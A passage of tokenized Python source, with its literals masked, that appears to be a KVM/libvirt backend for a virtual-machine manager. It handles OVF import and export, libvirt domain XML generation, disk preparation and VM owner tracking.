"<STR_LIT>" , ovfutil . get_ovf_max_vcpu ( ovf_file ) ) ] <EOL> settings . update ( dict ( filter ( operator . itemgetter ( <NUM_LIT:1> ) , vcpu_settings ) ) ) <EOL> network_list = ovfutil . get_networks ( ovf_file ) <EOL> for network in network_list : <EOL> settings [ "<STR_LIT>" ] . append ( { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : network [ "<STR_LIT>" ] } ) <EOL> settings [ "<STR_LIT>" ] = ovfutil . get_disks ( ovf_file ) <EOL> settings [ "<STR_LIT>" ] = ovfutil . get_openode_features ( ovf_file ) <EOL> settings [ '<STR_LIT>' ] = ovfutil . 
get_root_password ( ovf_file ) <EOL> settings [ '<STR_LIT:username>' ] = ovfutil . get_admin_username ( ovf_file ) <EOL> return settings <EOL> def deploy ( settings , storage_pool ) : <EOL> log = get_logger ( ) <EOL> log . info ( "<STR_LIT>" ) <EOL> prepare_file_system ( settings , storage_pool ) <EOL> log . info ( "<STR_LIT>" ) <EOL> libvirt_conf_dom = generate_libvirt_conf ( settings ) <EOL> log . info ( "<STR_LIT>" ) <EOL> conn = libvirt . open ( "<STR_LIT>" ) <EOL> conn . defineXML ( libvirt_conf_dom . toxml ( ) ) <EOL> log . info ( "<STR_LIT>" ) <EOL> def prepare_file_system ( settings , storage_pool ) : <EOL> """<STR_LIT>""" <EOL> config = get_config ( ) <EOL> log = get_logger ( ) <EOL> images_dir = path . join ( config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> storage_pool , "<STR_LIT>" ) <EOL> target_dir = path . join ( config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> storage_pool , "<STR_LIT>" , "<STR_LIT>" ) <EOL> for disk_index , disk in enumerate ( settings . get ( "<STR_LIT>" , [ ] ) ) : <EOL> disk_template_path = path . join ( target_dir , disk [ "<STR_LIT>" ] ) <EOL> if disk [ "<STR_LIT>" ] == "<STR_LIT:file>" : <EOL> volume_name = "<STR_LIT>" % disk_index <EOL> disk [ "<STR_LIT>" ] = '<STR_LIT>' % ( settings [ "<STR_LIT>" ] , settings [ "<STR_LIT>" ] , <EOL> volume_name , disk . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> disk_deploy_path = path . join ( images_dir , disk [ "<STR_LIT>" ] ) <EOL> shutil . copy2 ( disk_template_path , disk_deploy_path ) <EOL> diskspace = settings . get ( '<STR_LIT>' ) <EOL> if diskspace : <EOL> diskspace = int ( float ( diskspace ) ) <EOL> current_size = int ( execute ( "<STR_LIT>" <EOL> % disk_deploy_path ) ) / <NUM_LIT> / <NUM_LIT> / <NUM_LIT> <EOL> if diskspace > current_size : <EOL> log . info ( '<STR_LIT>' % ( disk_deploy_path , <EOL> current_size , diskspace ) ) <EOL> execute ( "<STR_LIT>" % ( disk_deploy_path , diskspace ) ) <EOL> else : <EOL> log . 
info ( '<STR_LIT>' <EOL> % ( disk_deploy_path , diskspace , current_size ) ) <EOL> elif disk [ "<STR_LIT>" ] in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> disk_deploy_path = disk [ "<STR_LIT>" ] <EOL> execute ( "<STR_LIT>" % ( disk_template_path , disk_deploy_path ) ) <EOL> def adjust_setting_to_systems_resources ( ovf_template_settings ) : <EOL> """<STR_LIT>""" <EOL> st = ovf_template_settings <EOL> st [ "<STR_LIT>" ] = str ( min ( sysres . get_ram_size_gb ( ) , float ( st . get ( "<STR_LIT>" , <NUM_LIT:10> ** <NUM_LIT:30> ) ) ) ) <EOL> st [ "<STR_LIT>" ] = str ( min ( float ( st [ "<STR_LIT>" ] ) , float ( st [ "<STR_LIT>" ] ) ) ) <EOL> st [ "<STR_LIT>" ] = str ( min ( sysres . get_cpu_count ( ) , int ( st . get ( "<STR_LIT>" , <NUM_LIT:10> ** <NUM_LIT:10> ) ) ) ) <EOL> st [ "<STR_LIT>" ] = str ( min ( int ( st [ "<STR_LIT>" ] ) , int ( st [ "<STR_LIT>" ] ) ) ) <EOL> errors = [ ] <EOL> if float ( st [ "<STR_LIT>" ] ) > float ( st [ "<STR_LIT>" ] ) : <EOL> errors . append ( "<STR_LIT>" % <EOL> ( st [ "<STR_LIT>" ] , st [ "<STR_LIT>" ] ) ) <EOL> if int ( st [ "<STR_LIT>" ] ) > int ( st [ "<STR_LIT>" ] ) : <EOL> errors . append ( "<STR_LIT>" % <EOL> ( st [ "<STR_LIT>" ] , st [ "<STR_LIT>" ] ) ) <EOL> return errors <EOL> def get_available_instances ( ) : <EOL> """<STR_LIT>""" <EOL> conn = libvirt . open ( "<STR_LIT>" ) <EOL> name_list = conn . listDefinedDomains ( ) <EOL> return dict ( zip ( name_list , name_list ) ) <EOL> def get_all_instances ( ) : <EOL> """<STR_LIT>""" <EOL> return get_available_instances ( ) <EOL> def generate_libvirt_conf ( settings ) : <EOL> """<STR_LIT>""" <EOL> libvirt_conf_dom = xml . dom . minidom . Document ( ) <EOL> domain_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> domain_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] ) <EOL> libvirt_conf_dom . appendChild ( domain_dom ) <EOL> name_dom = libvirt_conf_dom . createElement ( "<STR_LIT:name>" ) <EOL> name_value = libvirt_conf_dom . 
createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> name_dom . appendChild ( name_value ) <EOL> domain_dom . appendChild ( name_dom ) <EOL> uuid_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> uuid_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> uuid_dom . appendChild ( uuid_value ) <EOL> domain_dom . appendChild ( uuid_dom ) <EOL> memory_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> memory_value = libvirt_conf_dom . createTextNode ( str ( int ( float ( settings [ "<STR_LIT>" ] ) * <NUM_LIT> ** <NUM_LIT:2> ) ) ) <EOL> memory_dom . appendChild ( memory_value ) <EOL> domain_dom . appendChild ( memory_dom ) <EOL> vcpu_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> vcpu_value = libvirt_conf_dom . createTextNode ( str ( settings [ "<STR_LIT>" ] ) ) <EOL> vcpu_dom . appendChild ( vcpu_value ) <EOL> domain_dom . appendChild ( vcpu_dom ) <EOL> os_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> os_type_dom = libvirt_conf_dom . createElement ( "<STR_LIT:type>" ) <EOL> os_type_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> os_type_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> os_type_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> os_type_dom . appendChild ( os_type_value ) <EOL> os_dom . appendChild ( os_type_dom ) <EOL> os_boot_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> os_boot_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> os_dom . appendChild ( os_boot_dom ) <EOL> domain_dom . appendChild ( os_dom ) <EOL> features_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> for feature in settings [ "<STR_LIT>" ] : <EOL> feature_dom = libvirt_conf_dom . createElement ( feature ) <EOL> features_dom . appendChild ( feature_dom ) <EOL> domain_dom . appendChild ( features_dom ) <EOL> clock_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> clock_dom . 
setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> domain_dom . appendChild ( clock_dom ) <EOL> timer_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> timer_dom . setAttribute ( "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> timer_dom . setAttribute ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> clock_dom . appendChild ( timer_dom ) <EOL> on_poweroff_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> on_poweroff_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> on_poweroff_dom . appendChild ( on_poweroff_value ) <EOL> domain_dom . appendChild ( on_poweroff_dom ) <EOL> on_reboot_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> on_reboot_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> on_reboot_dom . appendChild ( on_reboot_value ) <EOL> domain_dom . appendChild ( on_reboot_dom ) <EOL> on_crash_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> on_crash_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> on_crash_dom . appendChild ( on_crash_value ) <EOL> domain_dom . appendChild ( on_crash_dom ) <EOL> devices_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> domain_dom . appendChild ( devices_dom ) <EOL> emulator_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> emulator_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> emulator_dom . appendChild ( emulator_value ) <EOL> devices_dom . appendChild ( emulator_dom ) <EOL> drive_letter_count = <NUM_LIT:0> <EOL> for disk in settings [ "<STR_LIT>" ] : <EOL> if disk [ "<STR_LIT>" ] == "<STR_LIT:file>" : <EOL> disk_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> disk_dom . setAttribute ( "<STR_LIT:type>" , disk [ "<STR_LIT:type>" ] ) <EOL> disk_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( disk_dom ) <EOL> driver_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> driver_dom . 
setAttribute ( "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT:type>" , disk . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> driver_dom . setAttribute ( "<STR_LIT>" , "<STR_LIT:none>" ) <EOL> disk_dom . appendChild ( driver_dom ) <EOL> disk_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> config = get_config ( ) <EOL> image_path = path . join ( config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> disk_source_dom . setAttribute ( "<STR_LIT:file>" , path . join ( image_path , <EOL> disk [ "<STR_LIT>" ] ) ) <EOL> disk_dom . appendChild ( disk_source_dom ) <EOL> disk_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_target_dom ) <EOL> elif disk [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> disk_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> disk_dom . setAttribute ( "<STR_LIT:type>" , disk [ "<STR_LIT:type>" ] ) <EOL> disk_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( disk_dom ) <EOL> driver_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT>" , "<STR_LIT:none>" ) <EOL> devices_dom . appendChild ( driver_dom ) <EOL> disk_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> disk_source_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_source_dom ) <EOL> disk_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . 
appendChild ( disk_target_dom ) <EOL> elif ( disk [ "<STR_LIT>" ] == "<STR_LIT>" ) : <EOL> disk_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> disk_dom . setAttribute ( "<STR_LIT:type>" , disk [ "<STR_LIT:type>" ] ) <EOL> disk_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( disk_dom ) <EOL> disk_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> disk_source_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_source_dom ) <EOL> disk_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_target_dom ) <EOL> drive_letter_count = drive_letter_count + <NUM_LIT:1> <EOL> for interface in settings [ "<STR_LIT>" ] : <EOL> interface_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_dom . setAttribute ( "<STR_LIT:type>" , interface [ "<STR_LIT:type>" ] ) <EOL> devices_dom . appendChild ( interface_dom ) <EOL> interface_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> interface_source_dom . setAttribute ( "<STR_LIT>" , interface [ "<STR_LIT>" ] ) <EOL> interface_dom . appendChild ( interface_source_dom ) <EOL> if '<STR_LIT>' in interface : <EOL> interface_mac_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_mac_dom . setAttribute ( "<STR_LIT:address>" , interface [ "<STR_LIT>" ] ) <EOL> interface_dom . appendChild ( interface_mac_dom ) <EOL> elif '<STR_LIT>' in settings : <EOL> interface_mac_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_mac_dom . setAttribute ( "<STR_LIT:address>" , settings [ "<STR_LIT>" ] ) <EOL> interface_dom . appendChild ( interface_mac_dom ) <EOL> if '<STR_LIT>' in settings : <EOL> interface_filter_dom = libvirt_conf_dom . 
createElement ( "<STR_LIT>" ) <EOL> interface_filter_dom . setAttribute ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> interface_dom . appendChild ( interface_filter_dom ) <EOL> interface_filter_ip_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_filter_ip_dom . setAttribute ( "<STR_LIT:name>" , '<STR_LIT>' ) <EOL> interface_filter_ip_dom . setAttribute ( "<STR_LIT:value>" , settings [ '<STR_LIT>' ] ) <EOL> interface_filter_dom . appendChild ( interface_filter_ip_dom ) <EOL> serial_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> serial_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] ) <EOL> devices_dom . appendChild ( serial_dom ) <EOL> serial_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> serial_target_dom . setAttribute ( "<STR_LIT:port>" , str ( settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ) <EOL> serial_dom . appendChild ( serial_target_dom ) <EOL> console_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> console_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] ) <EOL> devices_dom . appendChild ( console_dom ) <EOL> console_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> console_target_dom . setAttribute ( "<STR_LIT:port>" , str ( settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ) <EOL> console_dom . appendChild ( console_target_dom ) <EOL> input_type_dom = libvirt_conf_dom . createElement ( "<STR_LIT:input>" ) <EOL> input_type_dom . setAttribute ( "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> input_type_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( input_type_dom ) <EOL> graphics_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> graphics_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] ) <EOL> graphics_dom . setAttribute ( "<STR_LIT:port>" , str ( settings [ "<STR_LIT>" ] [ "<STR_LIT:port>" ] ) ) <EOL> graphics_dom . 
setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> graphics_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( graphics_dom ) <EOL> return libvirt_conf_dom <EOL> def save_as_ovf ( vm_settings , storage_pool , unpack = True ) : <EOL> """<STR_LIT>""" <EOL> config = get_config ( ) <EOL> log = get_logger ( ) <EOL> target_dir = path . join ( config . getstring ( '<STR_LIT>' , '<STR_LIT>' ) , storage_pool , "<STR_LIT>" ) <EOL> if unpack : <EOL> target_dir = path . join ( target_dir , '<STR_LIT>' ) <EOL> msg = "<STR_LIT>" <EOL> log . info ( msg ) <EOL> vm_settings [ "<STR_LIT>" ] = _prepare_disks ( vm_settings , target_dir ) <EOL> msg = "<STR_LIT>" <EOL> log . info ( msg ) <EOL> ovf = _generate_ovf_file ( vm_settings ) <EOL> ovf_fnm = path . join ( target_dir , "<STR_LIT>" % vm_settings [ "<STR_LIT>" ] ) <EOL> with open ( ovf_fnm , '<STR_LIT:w>' ) as f : <EOL> ovf . writeFile ( f , pretty = True , encoding = '<STR_LIT>' ) <EOL> msg = "<STR_LIT>" <EOL> log . info ( msg ) <EOL> arch_location = path . join ( config . getstring ( '<STR_LIT>' , '<STR_LIT>' ) , storage_pool , "<STR_LIT>" ) <EOL> ovf_archive_fnm = path . join ( arch_location , "<STR_LIT>" % vm_settings [ "<STR_LIT>" ] ) <EOL> with closing ( tarfile . open ( ovf_archive_fnm , "<STR_LIT:w>" ) ) as tar : <EOL> tar . add ( ovf_fnm , arcname = path . basename ( ovf_fnm ) ) <EOL> for disk in vm_settings [ "<STR_LIT>" ] : <EOL> tar . add ( disk [ "<STR_LIT>" ] , arcname = path . basename ( disk [ "<STR_LIT>" ] ) ) <EOL> if not unpack : <EOL> os . remove ( ovf_fnm ) <EOL> for disk in vm_settings [ "<STR_LIT>" ] : <EOL> os . remove ( disk [ "<STR_LIT>" ] ) <EOL> calculate_hash ( ovf_archive_fnm ) <EOL> msg = "<STR_LIT>" % ovf_archive_fnm <EOL> log . info ( msg ) <EOL> def _prepare_disks ( vm_settings , target_dir ) : <EOL> """<STR_LIT>""" <EOL> disk_list_dom = get_libvirt_conf_xml ( vm_settings [ "<STR_LIT>" ] ) . 
getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . getElementsByTagName ( "<STR_LIT>" ) <EOL> disk_num , disk_list = <NUM_LIT:0> , [ ] <EOL> for disk_dom in disk_list_dom : <EOL> if disk_dom . getAttribute ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> disk_num += <NUM_LIT:1> <EOL> source_dom = disk_dom . getElementsByTagName ( "<STR_LIT:source>" ) [ <NUM_LIT:0> ] <EOL> filename = "<STR_LIT>" % ( vm_settings [ "<STR_LIT>" ] , disk_num ) <EOL> new_path = path . join ( target_dir , filename ) <EOL> if disk_dom . getAttribute ( "<STR_LIT:type>" ) == "<STR_LIT:file>" : <EOL> disk_path = source_dom . getAttribute ( "<STR_LIT:file>" ) <EOL> shutil . copy2 ( disk_path , new_path ) <EOL> elif disk_dom . getAttribute ( "<STR_LIT:type>" ) == "<STR_LIT>" : <EOL> source_dev = source_dom . getAttribute ( "<STR_LIT>" ) <EOL> execute ( "<STR_LIT>" % ( source_dev , new_path ) ) <EOL> disk_dict = { <EOL> "<STR_LIT>" : str ( get_file_size_bytes ( new_path ) ) , <EOL> "<STR_LIT:filename>" : filename , <EOL> "<STR_LIT>" : new_path , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( disk_num ) , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( disk_num ) , <EOL> "<STR_LIT>" : str ( get_kvm_disk_capacity_bytes ( new_path ) ) <EOL> } <EOL> disk_list . append ( disk_dict ) <EOL> return disk_list <EOL> def get_kvm_disk_capacity_bytes ( path ) : <EOL> msg = "<STR_LIT>" % path <EOL> get_logger ( ) . info ( msg ) <EOL> res = execute ( "<STR_LIT>" % ( path ) ) <EOL> rows = res . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:2> : ] <EOL> capacity = <NUM_LIT:0> <EOL> for row in rows : <EOL> row_elements = row . split ( "<STR_LIT:U+002C>" ) <EOL> used , available = int ( row_elements [ <NUM_LIT:3> ] ) , int ( row_elements [ <NUM_LIT:4> ] ) <EOL> capacity += used + available <EOL> return capacity * <NUM_LIT> <EOL> def _generate_ovf_file ( vm_settings ) : <EOL> """<STR_LIT>""" <EOL> ovf = OvfFile ( ) <EOL> ovf . files = [ ] <EOL> ovf . createEnvelope ( ) <EOL> ovf . envelope . 
setAttribute ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> instanceId = <NUM_LIT:0> <EOL> virtualSystem = ovf . createVirtualSystem ( ident = vm_settings [ "<STR_LIT>" ] , <EOL> info = "<STR_LIT>" ) <EOL> hardwareSection = ovf . createVirtualHardwareSection ( node = virtualSystem , <EOL> ident = "<STR_LIT>" , <EOL> info = "<STR_LIT>" ) <EOL> ovf . createSystem ( hardwareSection , "<STR_LIT>" , str ( instanceId ) , <EOL> { "<STR_LIT>" : "<STR_LIT>" % ( vm_settings [ "<STR_LIT>" ] , vm_settings [ "<STR_LIT>" ] ) } ) <EOL> instanceId += <NUM_LIT:1> <EOL> for bound , cpu in zip ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ vm_settings . get ( "<STR_LIT>" % pfx ) for pfx in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] ) : <EOL> if cpu : <EOL> ovf . addResourceItem ( hardwareSection , { <EOL> "<STR_LIT>" : "<STR_LIT>" % cpu , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % cpu , <EOL> "<STR_LIT>" : str ( instanceId ) , <EOL> "<STR_LIT>" : "<STR_LIT:3>" , <EOL> "<STR_LIT>" : cpu <EOL> } , bound = bound ) <EOL> instanceId += <NUM_LIT:1> <EOL> for bound , memory in zip ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ vm_settings . get ( "<STR_LIT>" % pfx ) for pfx in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] ) : <EOL> if memory : <EOL> ovf . addResourceItem ( hardwareSection , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % memory , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % memory , <EOL> "<STR_LIT>" : str ( instanceId ) , <EOL> "<STR_LIT>" : "<STR_LIT:4>" , <EOL> "<STR_LIT>" : memory <EOL> } , bound = bound ) <EOL> instanceId += <NUM_LIT:1> <EOL> network_list = [ ] <EOL> for interface in vm_settings [ "<STR_LIT>" ] : <EOL> if interface [ "<STR_LIT:type>" ] == "<STR_LIT>" : <EOL> ovf . 
addResourceItem ( hardwareSection , { <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT:true>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" % instanceId , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> network_list . append ( { <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } ) <EOL> instanceId += <NUM_LIT:1> <EOL> ovf . createNetworkSection ( network_list , "<STR_LIT>" ) <EOL> ovf_disk_list = [ ] <EOL> for disk in vm_settings [ "<STR_LIT>" ] : <EOL> ref_file = OvfReferencedFile ( path = disk [ "<STR_LIT>" ] , href = disk [ "<STR_LIT:filename>" ] , <EOL> file_id = disk [ "<STR_LIT>" ] , size = disk [ "<STR_LIT>" ] ) <EOL> ovf . addReferencedFile ( ref_file ) <EOL> ovf_disk_list . append ( { <EOL> "<STR_LIT>" : disk [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : disk [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : str ( disk [ "<STR_LIT>" ] ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None <EOL> } ) <EOL> ovf . createReferences ( ) <EOL> ovf . createDiskSection ( ovf_disk_list , "<STR_LIT>" ) <EOL> doc = xml . dom . minidom . Document ( ) <EOL> on_section = doc . createElement ( "<STR_LIT>" ) <EOL> on_section . setAttribute ( "<STR_LIT>" , "<STR_LIT:false>" ) <EOL> virtualSystem . appendChild ( on_section ) <EOL> info_dom = doc . createElement ( "<STR_LIT>" ) <EOL> on_section . appendChild ( info_dom ) <EOL> info_value = doc . createTextNode ( "<STR_LIT>" ) <EOL> info_dom . appendChild ( info_value ) <EOL> features_dom = doc . createElement ( "<STR_LIT>" ) <EOL> on_section . appendChild ( features_dom ) <EOL> admin_password = doc . 
createElement ( '<STR_LIT>' ) <EOL> on_section . appendChild ( admin_password ) <EOL> password_value = doc . createTextNode ( vm_settings [ '<STR_LIT>' ] ) <EOL> admin_password . appendChild ( password_value ) <EOL> for feature in vm_settings [ "<STR_LIT>" ] : <EOL> feature_dom = doc . createElement ( feature ) <EOL> features_dom . appendChild ( feature_dom ) <EOL> return ovf <EOL> def get_id_by_uuid ( conn , uuid , backend = "<STR_LIT>" ) : <EOL> return None if conn . lookupByUUIDString ( uuid ) . ID ( ) < <NUM_LIT:0> else conn . lookupByUUIDString ( uuid ) . ID ( ) <EOL> def set_owner ( conn , uuid , owner ) : <EOL> """<STR_LIT>""" <EOL> owners_file = '<STR_LIT>' <EOL> if not os . path . exists ( owners_file ) : <EOL> open ( owners_file , '<STR_LIT:a>' ) . close ( ) <EOL> with open ( owners_file , '<STR_LIT>' ) as f : <EOL> kvmowners = f . read ( ) <EOL> kvmowners = kvmowners . split ( '<STR_LIT:\n>' ) <EOL> added = False <EOL> for k , v in enumerate ( kvmowners ) : <EOL> if uuid in v : <EOL> kvmowners [ k ] = '<STR_LIT:=>' . join ( [ str ( uuid ) , str ( owner ) ] ) <EOL> added = True <EOL> if not added : <EOL> kvmowners . append ( '<STR_LIT:=>' . join ( [ str ( uuid ) , str ( owner ) ] ) ) <EOL> with open ( owners_file + '<STR_LIT>' , '<STR_LIT>' ) as f : <EOL> f . write ( '<STR_LIT:\n>' . join ( kvmowners ) ) <EOL> os . rename ( owners_file , owners_file + '<STR_LIT>' ) <EOL> os . rename ( owners_file + '<STR_LIT>' , owners_file ) <EOL> vmid = get_id_by_uuid ( conn , uuid ) <EOL> if not vmid : <EOL> return <EOL> vm = conn . lookupByID ( vmid ) <EOL> domain = ET . fromstring ( vm . XMLDesc ( <NUM_LIT:0> ) ) <EOL> metadata = domain . find ( '<STR_LIT>' ) or ET . SubElement ( domain , '<STR_LIT>' ) <EOL> owner_e = ET . SubElement ( metadata , ET . QName ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> owner_e . text = owner <EOL> open ( '<STR_LIT>' % ( vm . name ( ) ) , '<STR_LIT:w>' ) . write ( ET . tostring ( domain ) ) <EOL> data = open ( '<STR_LIT>' % ( vm . 
name ( ) ) , '<STR_LIT:r>' ) . read ( ) <EOL> domain_n = ET . fromstring ( data ) <EOL> owner_e = domain_n . find ( '<STR_LIT>' ) <EOL> assert owner_e is not None <EOL> assert owner_e . text == owner <EOL> return owner_e . text <EOL> def get_owner ( conn , uuid ) : <EOL> """<STR_LIT>""" <EOL> owners_file = '<STR_LIT>' <EOL> with open ( owners_file , '<STR_LIT>' ) as f : <EOL> kvmowners = f . read ( ) <EOL> kvmowners = kvmowners . split ( '<STR_LIT:\n>' ) <EOL> for k , v in enumerate ( kvmowners ) : <EOL> if uuid in v : <EOL> return v . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] <EOL> vmid = get_id_by_uuid ( conn , uuid ) <EOL> if not vmid : <EOL> return <EOL> vm = conn . lookupByID ( vmid ) <EOL> data = open ( '<STR_LIT>' % ( vm . name ( ) ) , '<STR_LIT:r>' ) . read ( ) <EOL> domain = ET . fromstring ( data ) <EOL> owner = domain . find ( '<STR_LIT>' ) <EOL> if owner is not None : <EOL> return owner . text <EOL> def vm_metrics ( conn , vm ) : <EOL> def cpu_usage ( ) : <EOL> hn_stats = conn . getCPUStats ( True , <NUM_LIT:0> ) <EOL> if hn_stats is None : <EOL> return <NUM_LIT:0.0> <EOL> time_now = ( vm . getCPUStats ( True , <NUM_LIT:0> ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> sum ( hn_stats . itervalues ( ) ) 